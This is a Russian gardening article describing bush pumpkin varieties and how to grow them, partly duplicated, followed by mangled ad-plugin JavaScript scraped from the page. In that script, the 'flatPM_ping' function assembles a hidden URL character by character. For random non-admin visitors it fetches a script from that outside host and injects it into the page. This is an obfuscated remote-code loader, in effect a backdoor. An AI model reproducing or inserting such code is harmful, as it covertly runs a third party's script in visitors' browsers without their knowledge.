Для посадки подойдет посевной материал, которому менее 3 лет. Сначала отбирают крупные и полновесные семечки. Далее их заливают нагретой до 50 °С водой. Оставляют на несколько часов. Потом заворачивают во влажную ткань. Проклюнувшиеся семечки укладывают в холодильник, в отсек для овощей.

Посев в открытый грунт

Этот способ высадки применяют в регионах с теплым климатом. Когда земля на глубине 10 см прогреется до 12 °С, делают ямки. Поливают. В каждую лунку помещают 2-3 семечки. Схема высадки – 0,7×0,7 м. После всходов оставляют один наиболее окрепший росток.

Выращивание рассады

Сосуды объемом 0,3 л наполняют землей, которую смешивают наполовину с перегноем. Семена проращивают за 20-22 дня до предполагаемой даты высадки. Их углубляют на 5 см, направляя «носиком» вниз. Оставляют в теплом помещении – 22-25 °С. После появления ростков температуру постепенно снижают.

Поливают растения регулярно и умеренно. Подкармливают дважды, используя комплексное удобрение. За 1-2 недели до высадки посевы закаляют. В открытый грунт высаживают в фазе 3-4 листьев.

Растение нуждается в регулярном поливе

Кустовые тыквы нуждаются в создании благоприятных условий.

Полив

Культура активно испаряет влагу через листья. Полив выполняют регулярно. Особенно растения нуждаются в обильном количестве влаги в такие периоды:

  • перед цветением;
  • при формировании плодов.

Воду берут отстоянную и теплую – 20 °С. За месяц до сбора плодов полив прекращают. Уход за растением предусматривает рыхление грунта после каждого увлажнения.

Подкормки

Если почва удобрена с осени, то дополнительно вносить питательные вещества не нужно. Когда она истощена, проводят такие подкормки:

  • спустя 10 дней после посадки берут 1 л навоза на ведро воды. Можно также взять 10 г нитрофоски на 10 л жидкости;
  • во время плодоношения используют те же составы.

Можно удобрять растения 3-4 раза. Вместо навоза применяют куриный помет, зеленое удобрение. Органические подкормки чередуют с минеральными.

Искусственное опыление

Если погода плохая и отсутствуют насекомые-опылители, нужно самостоятельно перенести пыльцу. Для этого используют мягкую кисточку. Можно также прислонить мужской цветок к рыльцу женского.

Преимущества и недостатки

К достоинствам кустовых сортов культуры относят:

  • компактность – это свойство позволяет выращивать растение на небольших площадях открытого грунта;
  • строение куста – благодаря ему влага в грунте сохраняется дольше, что положительно влияет на урожайность;
  • переносимость низких температур;
  • легкость в уходе;
  • высокие показатели урожайности у большинства видов;
  • скоро- и среднеспелость – в отличие от плетистых сортов.

Среди недостатков кустовой тыквы выделяют:

  • преимущественно твердую кожуру;
  • плоды не всех сортов обладают сладостью.

Популярные сорта кустовой тыквы

Кустовая тыква – одна из разновидностей семейства тыквенных. Включает в себя несколько видов, отличающихся между собой описанием. Подходит для выращивания в разных регионах. Имеет ряд преимуществ для культивирования в условиях приусадебного участка. Требует соблюдения некоторых приемов агротехники.

Популярные сорта кустовой тыквы

Особенности тыквенных сортов

У кустовой тыквы яркая оранжевая мякоть. Она обладает хорошими гастрономическими характеристиками и высоким содержанием каротина.

Растение компактное, стебли прямостоячие, а плоды формируются в области основания.

Каждый тыквенный сорт отличается скороспелостью, достигая биологической зрелости за 80-100 суток.

При выборе подходящего вида для выращивания исходят из нескольких характеристик:

  • периода технического созревания;
  • размера овощей и их формы;
  • вкусовых качеств и толщины тыквенной мякоти;
  • показателей лежкости и транспортировки;
  • цифр урожайности.

Известные кустовые виды

Улыбка

  • урожайность достигает 280 ц/га ( 5-7 плодов на 1 куст);
  • средние размеры овощей правильной шаровидной формы от 0,8 до 1,2 кг;
  • холодостойкость позволяет выращивать сорт в неблагоприятных по климату условиях;
  • скороспелость обеспечивает полное вызревание урожая за 85 суток;
  • устойчивость к засухе;
  • транспортабельность и лежкость средняя.

Сорт Улыбка обладает яркой оранжевой сладкой мякотью средней толщины, небольшим количеством семян. Кожура тоже оранжевого оттенка с едва заметными полосками.

Лечебная

Кустовая Лечебная тыква относится к раннеспелым видам. Ее основное предназначение – использование в приготовлении блюд, т.к. мякоть содержит повышенную долю полезных элементов.

У неё есть один минус -тыква имеет слабый иммунитет и часто подвергается поражению мучнистой росой, антрактозом и гнилью.

Овощи слегка приплюснутые, со светлой серой коркой, покрытой едва заметным сетчатым рисунком.

Показатели урожайности высокие: 420 ц/га. Хранится долгое время, хорошо переносит транспортировку.

Жемчужина

Плоды сорта Жемчужина отличаются крупным размером

Сорт кустовой тыквы Жемчужина входит в число мускатных видов, дающих урожай за короткий промежуток времени (до 100 дней). Форма овощей цилиндрическая, длина до 0,5 м. Тыквенная корка светло-оранжевая с легким сизым оттенком.

Мускатную Жемчужину рекомендовано собирать в молодом возрасте, т.к. при хранении ее гастрономические качества становятся еще более интенсивными.

Отличается высокой урожайностью: 500 ц/га. Овощи вырастают крупных размеров и весят до 7 кг. С 1 куста собирают до 6 плодов.

Кустовой сорт Лель ранний, тыква созревает за 90 суток.

Плоды приплюснутой формы, цвет желтый с оранжевым, разбавленный светлыми коричневыми полосками. Средний вес – 3-3,5 кг.

Семена обладают высокими качественными характеристиками, часто идут на промышленное производство тыквенного масла.

В числе иных достоинств – устойчивость к ряду часто встречающихся болезней: мучнистой росе, пероноспорозу, антрактозу. Хорошо переносит изменение погодных условий, поэтому подходит для уральских и сибирских областей.

Оранжевая

Оранжевая кустовая тыква отличается долгими сроками хранения. Относится к раннеспелым, созревает за 90 суток. Устойчива к резким перепадам температур, поэтому подходит для регионов с холодным климатом.

Мякоть с низким содержанием сахара, потому основное предназначение сорта – использование в кулинарных целях для приготовления зимних заготовок и супов.

100-фунтовая

Отличается повышенным сроком созревания, дает урожай через 115-135 суток после посадки в открытый грунт.

Ее основное преимущество – большие размеры плодов (до 10 кг, а в некоторых случаях — до 20 кг). Они вырастают разной формы – шаровидной либо овальной

Мякоть сочная. Предпочитает умеренно теплый климат.

Акорн

Акорн дает небольшие по размеру плоды (1-1,5 кг), за что получил название желудевого. Часто цвет темный либо светло-зеленый, однако встречаются иные окраски.

Срок созревания – 85 суток.

Амазонка

Плоды можно хранить долгое время

Техническая спелость наступает спустя 90 суток с момента посадки в открытый грунт. Овощи имеют плоскую форму. Средний вес – 1-2 кг.

Основные преимущества Амазонки:

  • красивый товарный вид;
  • высокие вкусовые качества;
  • долгий срок хранения.

Грибовская-189

Сорт Грибовская-189 популярен в Сибири и на Урале, т.к. устойчив к погодным изменениям. Овощи вырастают кабачковой формы, продолговатые и зауженные с одного края.

Средний вес – 3-5 кг. показатели урожайности средние – до 8 кг/м².

Грибовскую тыкву предпочтительно срывать зеленой, т.к. в процессе дозревания ее мякоть улучшает вкусовые качества.

Относится к раннеспелым видам, созревая за 80-85 суток. Предпочитает умеренно-теплый климат.

Медовая красотка

У Медовой красотки вырастают овощи с красивым товарным видом и высокими гастрономическими качествами.

Форма плодов округлая, ребриста, вес до 6 кг. Цвет оранжевый. Средний срок созревания – 90-100 суток.

В числе недостатков – отсутствие у разновидности морозостойкости, потому он предпочтителен для регионов Средней полосы.

Выбор сортов с учетом региональных особенностей

Кустовые сорта для выращивания в разных регионах подбирают с учетом их особенностей, главные их которых – сроки созревания и устойчивость к пониженным температурам и засухам:

  • Для культивирования на всей территории России подходит Улыбка, обеспечивающая созревание овощей за короткое прохладное лето и одновременно устойчивая к жаркой погоде;
  • Для выращивания в условиях Сибири и Урала подходят раннеспелые сорта кустовой тыквы: Лечебная, мускатная Жемчужина, Лель, Оранжевая, Грибовская-189. Они устойчивы к резким перепадам температурных режимов и пониженному градусу;
  • В Средней полосы и регионов Подмосковья предпочитают Стофунтовую тыкву с овощами больших размеров, Медовую красотку, раннеспелые Акорн и Амазонку.

В средней полосе и Подмосковье посадку планируют на средние числа мая. Огородники Урала и Сибири планируют посадку сортов не ранее последних чисел мая – начала июня.

Особенности культивирования кустовой тыквы

Ухаживать за растением легко

Посадка и дальнейший уход за кустовыми сортами тыквы при выращивании мало чем отличается от правил культивирования классических разновидностей. Включает в себя:

  • высадку семенами либо рассадой в возрасте от 25 суток;
  • умеренный полив;
  • удаление сорной растительности;
  • рыхление грунта;
  • мульчирование междурядий.

Растения не требуют обязательного формирования куста с прищипыванием. Делают эти процедуры по собственной инициативе огородники, желающие придать кусту желаемый вид. Однако это никак не сказывается на урожайности овощной культуры.

После завязывания отростков обычно прищипывают верхушку центрального побега, а все точки роста прищипывают в августе. Это обеспечивает своевременное созревание овощей.

Высокие урожаи кустовые сорта дают на нейтральных плодородных почвах, которые раскисляют путем внесения мела либо доломитовой муки. Суглинистый и глинистый почвенные грунты разбавляют песком и торфом, что улучшает структуру и рыхлость земли.

В качестве удобряющих комплексов используют:

Достоинства

Преимущества кустовой тыквы:

  • компактное развитие дает возможность значительно экономить посадочное место на приусадебном участке;
  • привлекательный внешний вид, поэтому нередко используются в качестве живого украшения ландшафтного дизайна;
  • отсутствие длинных плетей не требует обязательного формирования куста с прищипыванием, что характерно для классических тыквенных разновидностей;
  • густая зеленая масса создает естественную преграду для грунта от высыхания, что значительно сокращает частоту требуемых поливов и уменьшает трудозатраты на выращивание и уход;
  • все виды отличаются высокими показателями урожайности.

Заключение

По описанию, кустовые тыквы – компактные растения, занимающие на огородном участке мало места. Включает несколько сортов, отличающихся морозоустойчивостью, урожайностью и сопротивляемостью к болезням. Преимущественно раннеспелые. Не требуют формирования куста.

Описание популярных сортов кустовой тыквы, их выращивание и урожайность

Привычное представление о тыкве — длинные плети, которые, если их вовремя не прищипнуть, расползаются по огороду, а иногда и к соседям норовят пробраться через щель в заборе. Тыква кустовая отличается от плетистой компактными кустами и отсутствием длинных побегов. При этом урожайность не страдает. Все современные сорта кустового типа имеют хорошие характеристики.

Особенности кустовой тыквы и ее преимущества

Выбор сортов тыквы кустовой большой, у каждого свои особенности выращивания, но есть общие моменты, характерные для культуры этого вида. Компактные кусты позволяют высаживать кустовую разновидность на небольших дачных участках. При желании ее можно садить в саду, используя как элемент ландшафтного дизайна.

Кусты декоративны в момент цветения и в период плодоношения, а темно-зеленые листья смотрятся нарядно на протяжении всего сезона. Стебли у растения прямостоячие, плети отсутствуют, плоды формируются у самого основания.

Преимущества кустовой тыквы:

  • не нужно формировать куст;
  • занимает мало места;
  • густая листва защищает почву от высыхания;
  • урожайность.

О главном достоинстве кустового вида — скороспелости стоит поговорить отдельно. У каждого сорта свой срок созревания, но в среднем все они достигают биологической спелости за 85–100 дней. При этом плоды обладают отменным вкусом и ароматом. У большей части сортов мякоть ярко-оранжевая, содержит большой процент каротина и других полезных микроэлементов.

Обзор и характеристика наиболее популярных сортов кустовой тыквы

Огородники не торопятся с посадкой тыквенных семян в открытый грунт, ждут хорошего прогревания почвы. Есть время, чтобы подобрать наиболее удачный сорт, а, точнее, сорта. Для этого нужно проанализировать все основные характеристики культуры:

  • сроки созревания;
  • форму и размер плодов;
  • вкус и толщину мякоти;
  • лежкость;
  • транспортабельность;
  • урожайность.

Улыбка

Описание тыквы Улыбка состоит из одних достоинств, поэтому многие дачники выбирают именно этот сорт. У сорта Улыбка на высоте основные характеристики:

  • урожайность (280 ц/га);
  • холодостойкость;
  • скороспелость (85 дней).

Для нашего короткого лета с неустойчивой погодой они подходят идеально. К концу лета на невысоких, компактных кустах успевают созреть порционные плоды (до 7 штук на одном кусту) весом от 800 г до 1200 г.

Плоды шаровидной формы, слабо сплюснутые, поверхность гладкая или слабосегментированная. Мякоть ярко-оранжевого цвета, сладкая, не отличается сочностью, по толщине средняя. Кожура оранжевая, на ней можно заметить малозаметные белые полосы. Семян в плодах мало. Достоинства: засухоустойчивая, транспортабельная, лежкая, дает хорошие урожаи при недостатке тепла, хороший вкус, возможность выращивания на всей территории РФ.

Лечебная

Кустовая тыква, относящаяся к раннеспелым сортам. Растение имеет столовое назначение, формирует сплюснутые, слабосегментированные плоды, покрытые светло-серой кожурой с темно-серым рисунком в виде сетки. Кора легко режется, мякоть на срезе ярко-оранжевая, средней толщины. Вкусовые характеристики мякоти:

  • хрустящая;
  • с большим содержанием сока;
  • нежная;
  • вкусная;
  • сочная.

Главные достоинства тыквы Лечебная: урожайность 42,1 т/га, длительное хранение, транспортабельность. Есть недостаток – слабый иммунитет. Растению требуется профилактика:

  • мучнистой росы;
  • антракноза;
  • гнилей (серой, белой).

Выращивать тыкву сорта Лечебная можно в Средней полосе РФ на Урале и в Сибири.

Жемчужина

Жемчужина — мускатная разновидность тыквы. Получить богатый урожай можно в короткие сроки. Выращивание кустовой тыквы Жемчужина длится около 100 дней. Вырастить крупные плоды весом до 7 кг несложно. Каждый куст выпускает по 6 побегов, на каждом из которых оставляют по одной завязи. Форма плодов цилиндрическая, длина 50 см.

Кожура оранжевая с легким налетом сизого оттенка. При хранении вкус темно-оранжевой мякоти становится более интенсивным. В ее составе много углеводов, витаминов, каротина и микроэлементов. Ценные качества мякоти:

Сорт ценят за высокую урожайность — 504 ц/га, засухоустойчивость, отличный вкус.

Кустовая оранжевая

Оранжевая тыква может храниться почти до Нового года, хотя сорт раннеспелый. Первые плоды созревают через 95–100 дней после всходов. Тыкву кустовую оранжевую успешно выращивают в Сибири, она не боится резких изменений погоды. В апреле, сажая рассаду тыквы кустовой оранжевой под укрывной материал, через 3 месяца получают ранний урожай круглых плодов весом до 5 кг. Посадка и уход за ней стандартный:

  • умеренный полив;
  • прополка;
  • рыхление или мульчирование междурядий.

Мякоть и шкурка оранжевые, сахаристость низкая, поэтому используют этот сорт для приготовления супов пюре, рагу, зимних заготовок и заморозки.

Стофунтовая

Созревание плодов происходит в средние сроки за 112–138 дней со времени появления всходов. Спелые плоды тыквы оранжевые и весят меньше 40 кг. Есть маленькое несоответствие названия с реальной массой плодов, небольшие тыквы весят 10 кг, крупные — 20 кг. Это мало влияет на популярность сорта, с каждым годом она только растет.

Плоды могут быть разной формы (шаровидной, овальной) с массой, зависящей от погодных условий и плодородия почвы. Мякоть у них очень сочная, ее используют для приготовления каш, пюре, едят в свежем виде. Этот сорт лучше развивается и плодоносит, если погода умеренно теплая.

Амазонка

Созревания плодов ждать недолго, они достигают технической спелости через 90 дней после появления всходов. Кусты Амазонки компактные. Плоды имеют красивую, плоскую форму с массой от 1 до 2 кг. Окраска кожуры и мякоти темно-оранжевая. Вкусовые качества плодов высокие, мякоть у них очень сочная, хрустящая, сладкая.
Достоинства сорта:

  • товарный вид;
  • отличный вкус;
  • хорошо хранится;
  • созревает рано.

Грибовская

Один из старых кустовых сортов тыквы Грибовская 189, его не нужно путать с другой замечательной тыквой Грибовской зимней. Кустовая разновидность популярна у сибирских и уральских дачников. Формой плоды напоминают кабачки, они продолговатые, зауженные с одного конца. Масса плодов 3–5 кг, с квадратного метра можно получить до 8 кг.

По мере развития у тыквы изменяется цвет кожуры. У молодых тыквин она зеленая с темными полосками, у спелых оранжевая с теми же зелеными полосками. Мякоть оранжевого цвета, очень плотная и вкусная. По срокам созревания сорт ранний, плоды созревают через 80 дней после всходов. Сорванные зелеными, они дозревают во время хранения.

Тыквенные заболевания обходят стороной тыкву Грибовскую зимнюю. Этот сорт любит тепло, формирует шаровидные плоды серого цвета весом до 4 кг. Они могут храниться в течение всей зимы. Толщина (5 см) и ярко-оранжевый цвет мякоти поражают. На высоте ее вкус и содержание питательных веществ. В мякоти Грибовской зимней есть и витамин C, и большое количество каротина.

Урожайность сорта Грибовская зимняя — 24,1 т/га. По срокам созревания сорт позднеспелый – от всходов до уборки проходит не менее 140 дней.

Руж Виф Дэтамп

Эту экзотичную культуру на дачном участке выращивать несложно. Сорт французской селекции нашел своих любителей среди российских дачников. Руж Виф Дэтамп входит в десятку популярных сортов тыквы кустового типа. Выращивать ее несложно, кусты невысокие, а плоды формируются крупные, весом до 10 кг.

Кожура розово-красная, мякоть светло-оранжевая, сочная, умеренно сладкая, из нее получается отличный сок. Хранятся плоды недолго, крайний срок — середина декабря. Многие дачники хвалят этот сорт за урожайность, но критикуют за средний вкус и аромат.

Уход за кустовой тыквой

Особенностей выращивания кустовой тыквы нет. Посадка и уход за этой разновидностью мало отличаются от ухода за плетистыми тыквами. Единственное важное отличие – способ формирования кустов. При выборе места учитывают достаточную освещенность участка и отсутствие сквозняков.

Почву при необходимости раскисляют, внося мел или доломитовую муку. В суглинистый и глинистый грунт добавляют песок, торф для улучшения его структуры. Корневая система лучше развивается в рыхлых, водопроницаемых почвах. Плодородие повышают, внося под перекопку:

  • компост;
  • перегной;
  • минеральные удобрения (суперфосфат, калийную селитру).

Используют два способа посадки тыквы: семенами в грунт, рассадой. Возраст готовой для высадки в открытый грунт рассады — 25 дней. В открытый грунт семена сеют в хорошо прогретую почву. Сроки посадки:

  • средняя полоса РФ — середина мая;
  • Урал, Сибирь — конец мая, начало июня.

Главный ориентир для посадки — текущий прогноз погоды. Тыква любит тепло и торопиться с посадкой не стоит, если есть угроза возвратных заморозков. При ранней посадке от заморозков тыкву спасает укрывной материал. Стандартная схема посадки для кустовых сортов тыквы 60х60 см.

Кустовая тыква любит, когда ее регулярно поливают теплой водой. Кратковременную засуху она переносит без большого ущерба, но длительная засуха может значительно уменьшить урожай тыквы. Метод дождевания не подходит для этой культуры. При поливе не нужно поливать листья, плоды и цветы. Вся вода должна попадать в лунку, сформированную вокруг центрального побега.

Тыква хорошо реагирует на подкормки. Увлекаться ими не стоит, достаточно подкормить ее азотным удобрением в начальный период, когда активно нарастает зеленая масса и фосфорно-калийными препаратами во время формирования плодов.

Кусты обычно не формируют, но после завязывания первого плода прищипывают макушку у главного побега. При большом количестве листьев часть удаляют, чтобы плоды больше получали солнечного света. В августе (10–15 числа) прищипывают все точки роста. Это необходимо сделать, чтобы все завязавшиеся плоды успели вызреть до наступления холодов.

О готовности плода к уборке судят по плодоножке и цвету кожуры. Плодоножка сохнет, а кожура приобретает соответствующий данному сорту цвет. Если ожидаются заморозки на почве, все плоды убирают, подмерзшие тыквы плохо хранятся. По возможности уборку урожая проводят в сухую и солнечную погоду. Плоды, собранные в дождь, сушат под навесом в течение нескольких дней.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};